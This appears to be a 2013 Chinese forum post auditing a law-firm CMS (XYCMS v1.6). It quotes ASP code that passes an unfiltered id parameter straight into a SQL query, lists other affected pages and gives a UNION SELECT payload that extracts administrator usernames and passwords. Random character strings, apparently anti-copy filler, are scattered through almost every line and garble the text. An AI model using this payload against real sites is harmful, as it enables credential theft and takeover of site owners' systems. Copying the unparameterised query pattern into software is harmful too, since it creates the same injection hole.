前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
; y, }% j4 F6 z2 w, f: z
' E( `# n6 a) @- Z6 Z. h淫荡分割线% |' X6 B) ^! ~- V
--------------------------------------------------------
1 C5 }3 m1 A" W2 i 4 t _) U% O9 x
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
1 z: a& Q; ~. m5 E9 }, z/ @ B源码地址:http://down.chinaz.com/soft/29233.htm
9 i5 U j9 ^2 h1 n ! i/ s% Q" B9 E# K: \8 ~$ K P
漏洞文件:shownews.asp2 D* \, @8 i- T1 Y# C
漏洞代码:7-13行) m2 c# }# z" T
* \7 `5 s+ ]0 v9 Q/ q$ S7 `
2 y% \( B) P* D6 l' n7 x$ B( i! @<%
5 x3 w+ d+ |& h5 Y v' V+ ~id=request.QueryString("id")1 a& o. o$ g/ Q3 p0 T( ?* T
6 o# Q) j0 s+ |. c# e3 \: J. f- @set snews=server.createobject("adodb.recordset") ( i1 k Z: ~; O
exec="select * from [news] where id="&id! b7 h- J! k! c6 `% X4 Q8 w3 f* w9 w
snews.open exec,conn,1,1. i7 i* K7 M; L5 P G$ n) G8 {
%>: t, f2 N9 F1 i4 h& r7 y2 J: ]6 b
3 O7 S$ A( Y( |9 O
# T/ O \3 R3 k* C
什么过滤都没有 直造成注入" y3 q+ ~1 Z: ^0 Y% S+ J5 N
' E! X, X# ~' K6 N6 l注入点:http://127.0.0.1:99/shownews.asp?id=xx
9 t9 b' Q6 k3 O' f & g1 n) X- {2 L0 K
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
, E( g" T7 c' q5 n. a( A- f W* ?
7 P% b* d- y" O6 x9 h) {7 f* U! [
1 g; r: h* x5 T/ g% v/ h' |exp: union select 1,admin,password,4,5,7 from admin_user
! a. |4 y+ A/ p' g. ?$ e9 K9 B+ c5 y- C$ z
|
发表于 2013-4-4 17:28:12
收藏
支持
反对